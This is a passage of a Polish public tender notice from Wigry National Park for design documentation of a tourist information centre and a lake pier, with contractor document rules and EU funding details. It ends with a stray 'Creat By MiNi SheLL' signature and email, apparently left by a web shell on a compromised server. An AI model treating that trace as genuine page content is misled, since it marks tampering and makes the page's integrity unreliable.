zakres dostępnych wykonawcy zasobów innego podmiotu,
sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.
 pisemne tj. w oryginale zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia
Każdy z wykonawców składających ofertę wspólną zobowiązany jest złożyć:
Oświadczenie o braku podstaw do wykluczenia
Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Listę kapitałową / informację o nie przynależności do grupy kapitałowej, w oryginale
Pozostałe dokumenty składane na potwierdzenie spełniania warunków wykonawcy składający ofertę wspólnie składają wspólnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wigry.win.pl/bip/index.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wigierski Park Narodowy Krzywe 82; 16-402 Suwałki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2014 godzina 09:00, miejsce: Wigierski Park Narodowy Krzywe 82; 16-402 Suwałki sekretariat Dyrektora Parku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedsięwzięcie jest realizowane z ramach projektu nr POIS.05.01.00-00-437 12  Ograniczenie presji turystycznej na cennych przyrodniczo obszarach Wigierskiego Parku Narodowego współfinansowanego przez Unię Europejską w ramach Programu Operacyjnego Infrastruktura i Środowisko V oś priorytetowa Ochrona przyrody i kształtowanie postaw ekologicznych: Działanie 5.1.3 Budowa lub modernizacja małej infrastruktury służącej zabezpieczeniu obszarów chronionych przed nadmierną i niekontrolowaną presją turystów .
Zadanie: I Dokumentacja projektowa i przetargowa.
Pkt. I.1.1. Wykonanie dokumentacji technicznej CIT w Krzywem.  
Pkt.I.1.4 Wykonanie dokumentacji technicznej pomostu przy MW w Starym Folwarku.
Projekt jest współfinansowany przez NFOŚ i GW w Warszawie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Projekt modernizacji Centrum Informacji Turystycznej w Krzywem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Modernizacja Centrum Informacji Turystycznej w Krzywem. 
Planowany zakres prac do zaprojektowania
Remont pomieszczenia CIT 
Remont posadzek-wymiana nawierzchni
Usunięcie glazury ze ścian, naprawa tynków i ich wymalowanie oraz wykonanie elementów ozdobnych i zabezpieczających ściany przed zabrudzeniem np. żywiczny tynk mozaikowy, wg. projektu aranżacji wnętrza.
Wymiana i dostosowanie wnętrzowej instalacji elektrycznej i tele-informatycznej celem ukrycia kabli i dostosowania do nowych funkcji pomieszczenia. Wymiana opraw oświetlenia wewnętrznego - zgodnie z projektem aranżacji wnętrza.
Wyburzenie murowanego wiatrołapu wewnątrz budynku i wykonanie nowego na zewnątrz w postaci przeszklonej konstrukcji aluminiowo-szklanej z instalacją elektryczną i podświetlanym kasetonem na ścianie frontowej.
Poszerzenie otworu drzwiowego w przejściu pomiędzy CIT a salą ekspozycyjną w celu umożliwienia przejazdu standardowego wózka inwalidzkiego.
Zaprojektowanie elementów wyposażenia wnętrza biurka, krzesła, regały, lada do obsługi turystów itp. z uwzględnieniem wytycznych projektu aranżacji wnętrza. Podstawowym materiałem z którego należy zaprojektować elementy wyposażenia jest drewno. Dopuszcza się łączenie drewna z innymi materiałami np. szkło, aluminium, stal nierdzewna, po uzyskaniu pisemnej akceptacji zamawiającego.
Wyznaczenie miejsca i wykonanie podejść umożliwiających sezonowe ustawienie automatu do dystrybucji napojów zimnych, gorących i  słodyczy. 
Remont magazynu rowerów w tym: szpachlowanie i malowanie tynków ścian i sufitu, lamperia z  tynku mozaikowego, wykonanie okładziny podłogowej z płytek gress.
Przebudowa instalacji elektrycznej celem dostosowania do potrzeb składowania i serwisowania rowerów.
Zaprojektowanie wyposażenia magazynku rowerowego w tym: stół warsztatowy z podstawowym osprzętem do bieżących napraw i  serwisowania rowerów, stojaki wieszaki na rowery, zapas części zamiennych dobór w porozumieniu z pracownikiem WPN
Wymiana sanitariatu kontenerowego w Krzywem	
Zaprojektowanie kontenera sanitarnego i podłączenia go do mediów woda, kanalizacja, instalacja elektryczna) nowego kontenera WC o konstrukcji stalowej z dachem dwu lub cztero spadowym pokrytym blachą powlekaną. Ściany z izolacją cieplną np. płyta warstwowa, z zewnątrz blacha wewnątrz trwałe i łatwe w utrzymaniu czystości tworzywo. W miejscu posadowienia kontenera istnieje dedykowane przyłącze wodociągowe i rurociąg do odprowadzenia ścieków, konieczne do zaprojektowania jest przyłącze energetyczne (przyłącze zalicznikowe, nie wymaga uzgodnień z ZE.
Kontener musi być wyposażony minimum w:
dwie kabiny WC w tym jedna przystosowana do potrzeb osób niepełnosprawnych
elektryczną instalację oświetleniową i gniazd wtykowych  
ogrzewanie elektryczne umożliwiające korzystanie z urządzenia do temperatury 00 C
elektryczny podgrzewacz c.w.u. oraz kolektor słoneczny z zasobnikiem wyposażonym w wężownicę wymiennik płytowy lub baterię fotowoltaiczną wraz z zasobnikiem z grzałką.
Wszelkie instalacje wodne należy zaprojektować w taki sposób aby możliwy było łatwe ich osuszenie i demontaż na okres zimy np. za pomocą szybkozłączy
Zakres opracowań projektowych:
Uzyskanie niezbędnych materiałów do projektowania w tym: mapy do celów projektowych i badań geotechnicznych gruntu.
Opracowanie projektu aranżacji wnętrza pomieszczenia CIT zawierającego dobór ozdobnych elementów graficznych ścian. Zastosowane elementy graficzne muszą być  związane z WPN i jego działalnością. Projekt oświetlenia z podziałem na dwie strefy funkcjonalne tj. biurową i obsługi turystów. Dobór mebli i wyposażenia w środki audiowizualne do przestrzeni biurowej i strefy obsługi turystów.  
Sporządzenie wielobranżowego (wszystkie branże) projektu budowlanego i wykonawczego wraz z wszelkimi dodatkowymi  opracowaniami, decyzjami (o warunkach zabudowy i  środowiskowych w tym związanych z obszarem Natura 2000) i uzgodnieniami niezbędnymi do uzyskania pozwolenia na budowę i wykonania robót budowlanych wraz z  uzyskaniem pozwolenia na budowę. Zakres i forma projektu budowlanego muszą być zgodne z wymaganiami rozporządzenia Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. z późniejszymi zmianami (Dz.U. 2012 nr 0 poz. 462 ze zm.)- projekt budowlany i wykonawczy, specyfikacje techniczne wykonania i odbioru robót oraz przedmiary muszą być sporządzone zgodnie z wymaganiami wynikającymi z rozporządzenia Min. Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072); 5 egz. w wersji graficznej oraz 1 kpl. w wersji elektronicznej na płycie CD lub innym nośniku elektronicznym w formacie PDF lub jpg.
Opracowanie wytycznych do planu BIOZ,
Sporządzenie kosztorysu inwestorskiego 1 egzemplarz w formie graficznej i na płycie CD DVD w formacie edytowalnym ath i przedmiarów robót w formie elektronicznej na płycie CD DVD w formacie edytowalnym ath oraz xls - edytowalnym pliku arkusza kalkulacyjnego. Kosztorys inwestorski musi być sporządzony zgodnie z rozporządzeniem Min. Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389).
Sporządzenie specyfikacji technicznych wykonania i odbioru robót budowlanych w
rozbiciu na szczegółowe specyfikacje techniczne zgodnie z wymogami ustawy prawo
zamówień publicznych, 1 egz.wersji graficznej oraz 1 kpl. w wersji elektronicznej na płycie CD w formacie PDF,
Ze względu na treść art. 29 pkt 3 ustawy Prawo Zamówień Publicznych w żadnym z elementów opracowanej dokumentacji nie mogą znaleźć się nazwy własne lub wskazanie producentów konkretnych produktów, urządzeń itp. W przypadku gdy będzie to niemożliwe wykonawca projektu szczegółowo opisze parametry jakie spełniać muszą produkty urządzenia równoważne. 
Wykonawca w opracowaniu projektowym opisze przedmiot zamówienia za pomocą cech technicznych i jakościowych, z zachowaniem Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy.
W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych
państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy
uwzględnia się w kolejności
europejskie aprobaty techniczne;
wspólne specyfikacje techniczne;
normy międzynarodowe;
inne techniczne systemy odniesienia ustanowione przez europejskie organy normalizacyjne.
W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych
państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy oraz aprobat, specyfikacji, norm i systemów, o których mowa wyżej, uwzględnia się w kolejności:
Polskie Normy;
polskie aprobaty techniczne;
polskie specyfikacje techniczne.
Opisując przedmiot zamówienia za pomocą norm, aprobat, specyfikacji technicznych i
systemów odniesienia, o których mowa wyżej, wykonawca jest obowiązany wskazać, że dopuszcza rozwiązania równoważne opisywanym i szczegółowo określić parametry, według których równoważność ta będzie oceniana.
Wymagania dodatkowe  
Projektant zobowiązuje się do sprawowania nadzoru autorskiego nad realizacją projektu.
Opracowana dokumentacja powinna zawierać oświadczenie, że jest wykonana zgodnie z obowiązującymi przepisami w zakresie projektowania i przepisami szczegółowymi    
Opracowaną dokumentację wraz z kompletem uzgodnień i pozwoleniami na budowę Wykonawca dostarczy do siedziby Zamawiającego,
Wykonawca sceduje na Zamawiającego wszelkie majątkowe prawa autorskie do projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Projekt budowy pomostu przy Muzeum Wigier w Starym Folwarku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa pomostu przy Muzeum Wigier w Starym Folwarku
Założenia do projektowania:
Rozbiórka istniejącego pomostu drewnianego o wymiarach 38 x 3,5 m
Zaprojektowanie  nowego pomostu w kształcie litery L o wymiarach : części prostopadłej do brzegu 40, 0 m x 5, 0 m i ramienia równoległego do brzegu  15,0 m x 3,0 m. Wysokość pokładu pomostu nad lustrem wody około 70 cm przy średniej wysokości lustra wody.
Pale nośne pomostów zaprojektować jako stalowe grubościenne rury wypełnione betonem.
Konstrukcja nośna - legary i kleszcze z drewna dębowego
Pokład z bali drewnianych (sosna) Na całej długości części ogólnodostępnej- od strony miejsca wykorzystywanego do kąpieli zaprojektować obniżenie pokładu ułatwiające wychodzenie z wody. 
Pokład pomostu w części prostopadłej do brzegu podzielony drewnianą barierą na dwie strefy funkcjonalne - kąpielisko i plażowanie o szerokości 3 m oraz obsługa jednostek pływających o szerokości 2 m.
Pokład i balustrady zaprojektować z drewna iglastego impregnowanego metodą próżniowo-ciśnieniową i następnie barwionego olejowym środkiem impregnacyjno dekoracyjnym.
W części równoległej do brzegu zaprojektować miejsce do cumowania statku pasażerskiego Leptodora  2 , z możliwością wchodzenia i schodzenia z pokładu statku. 
W części przylegającej do pomostu po stronie przeznaczonej do cumowania łodzi zaprojektować oczyszczenie dna jeziora z trzciny i mułu. Jeżeli w wyniku pomiarów okaże się to konieczne należy przewidzieć pogłębienie dna jeziora w strefie przybrzeżnej celem udostępnienia do cumowania całej długości pomostu. 
Zakres opracowań projektowych:
Pozyskanie map geodezyjnych do celów projektowych
Wykonanie badań geotechnicznych gruntu
Opracowanie dokumentacji niezbędnej do uzyskania nowej lub niezbędnej zmiany posiadanej przez zamawiającego decyzji o warunkach zabudowy
 Opracowanie dokumentacji niezbędnej do uzyskania  wszelkich decyzji w tym środowiskowych wymaganych przez instytucje opiniujące zamiar realizacji inwestycji.   
Opracowanie operatu wodnoprawnego 5 egz. w wersji graficznej oraz 1 kpl. w wersji elektronicznej na płycie CD lub innym nośniku elektronicznym w formacie PDF lub jpg. i uzyskanie pozwolenia wodnoprawnego.
Opracowanie kompletnej, zawierającej wszelkie wymagane prawem decyzje i uzgodnienia, dokumentacji projektowej (projekt budowlany i wykonawczy) niezbędnej do uzyskania pozwolenia na budowę i wykonania robót budowlanych. 5 egz. w wersji graficznej oraz 1 kpl. w wersji elektronicznej na płycie CD lub innym nośniku elektronicznym w formacie PDF lub jpg.
Sporządzenie specyfikacji technicznych wykonania i odbioru robót budowlanych w
rozbiciu na szczegółowe specyfikacje techniczne zgodnie z wymogami ustawy prawo
zamówień publicznych, 1 egz.wersji graficznej oraz 1 kpl. w wersji elektronicznej na    płycie CD w formacie PDF,
Sporządzenie kosztorysu inwestorskiego 1 egzemplarz w formie graficznej i na płycie CDDVD w formacie edytowalnym ath i przedmiarów robót w formie elektronicznej na płycie CDDVD w formacie edytowalnym ath oraz xls - edytowalnym pliku arkusza kalkulacyjnego. Kosztorys inwestorski musi być sporządzony zgodnie z rozporządzeniem Min. Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389).
Ze względu na treść art. 29 pkt 3 ustawy Prawo Zamówień Publicznych w żadnym z elementów opracowanej dokumentacji nie mogą znaleźć się nazwy własne lub wskazanie producentów konkretnych produktów, urządzeń itp. W przypadku gdy będzie to niemożliwe wykonawca projektu szczegółowo opisze parametry jakie spełniać muszą produktyurządzenia równoważne. 
 Wykonawca w opracowaniu projektowym opisze przedmiot zamówienia za pomocą cech technicznych i jakościowych, z zachowaniem Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy.
W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych
państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy
uwzględnia się w kolejności:
europejskie aprobaty techniczne;
wspólne specyfikacje techniczne;
normy międzynarodowe;
inne techniczne systemy odniesienia ustanowione przez europejskie organy normalizacyjne.
W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych
państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy oraz aprobat, specyfikacji, norm i systemów, o których mowa wyżej, uwzględnia się w kolejności:
Polskie Normy;
polskie aprobaty techniczne;
polskie specyfikacje techniczne.
Opisując przedmiot zamówienia za pomocą norm, aprobat, specyfikacji technicznych i
systemów odniesienia, o których mowa wyżej, wykonawca jest obowiązany wskazać, że dopuszcza rozwiązania równoważne opisywanym i szczegółowo określić parametry, według których równoważność ta będzie oceniana.
Wymagania dodatkowe  
Projektant zobowiązuje się do sprawowania nadzoru autorskiego nad realizacją projektu.
Opracowana dokumentacja powinna zawierać oświadczenie, że jest wykonana zgodnie z obowiązującymi przepisami w zakresie projektowania i przepisami szczegółowymi    
Opracowaną dokumentację wraz z kompletem uzgodnień i pozwoleniami na budowę Wykonawca dostarczy do siedziby Zamawiającego,
Wykonawca sceduje na Zamawiającego wszelkie majątkowe prawa autorskie do projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com